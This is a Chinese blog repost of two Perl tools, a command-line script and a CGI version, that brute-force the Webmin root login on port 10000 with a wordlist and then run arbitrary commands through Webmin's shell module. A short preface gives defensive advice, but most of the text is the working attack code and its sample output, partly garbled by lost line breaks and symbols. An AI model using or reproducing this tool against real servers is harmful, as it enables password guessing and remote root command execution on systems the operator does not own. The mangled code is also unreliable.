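Webmin 暴力破解+ 执行命令(转)

说明:下文转载的脚本在网页提取过程中丢失了换行和部分符号,已不是可直接阅读的完整代码。从可见内容看,它针对 Webmin 的 10000 端口,用字典向 /session_login.cgi 反复提交 root 口令,取得 sid 会话后再向 /shell/index.cgi 提交命令。对管理员而言,这意味着应限制可访问 10000 端口的来源地址,启用 Webmin 的登录失败封锁,为 root 设置强口令,并对不需要的账号关闭命令行模块;同时在 Webmin 访问日志中留意同一来源对 /session_login.cgi 的大量连续 POST 请求。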

Webmin 暴力破解+ 执行命令(转)[@more@]Webmin是一个广泛使用的,运行在linux/unix下,用浏览器来管理系统的工具。用它,你不必知道复杂的命令行,也不用了解各种复杂的配置文件,系统管理变得非常简单!可以设置帐号,配置DNS和文件共享等. Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo - _2@012.net.il"> DiAblo_2@012.net.il # v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5 "; print "usage: "; print " webmin15.pl "; print "example: "; print " webmin15.pl www.abcd.com "id" wordlist.txt "; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "############################# "; print results "Webmin BruteForce + Command execution v1.5 "; print results "Host:$host "; print results "############################# "; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist "; print results "[-] Webmin on this host does not exist "; exit; }else{ $sock->close; print "[+] 
BruteForcing... "; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/ ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass "; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid "; print "[+] Password : $pass "; print results "[+]:Password:$pass Sid:$sid "; } } } $sock->close; print results "[-]$pass "; } print "[+] Connecting to host once again "; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution "; print results "[-] Cant Connect once again for command execution "; } print "[+] Connected.. Sending Buffer "; my $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". 
"Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/shell/ ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd "; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1." ";} if ($answer=~/
>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/
/g){ exit; } else { print $answer; print results "[+]$answer "; } } } } #!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~ Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/ ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/shell/ ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/
/g){ exit; } else { print $answer; } } } } } if($atak eq ""){ print qq~
Webmin Web Brute Force v1.5 - cgi version

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10617542/viewspace-949065/,如需转载,请注明出处,否则将追究法律责任。


转载于:http://blog.itpub.net/10617542/viewspace-949065/
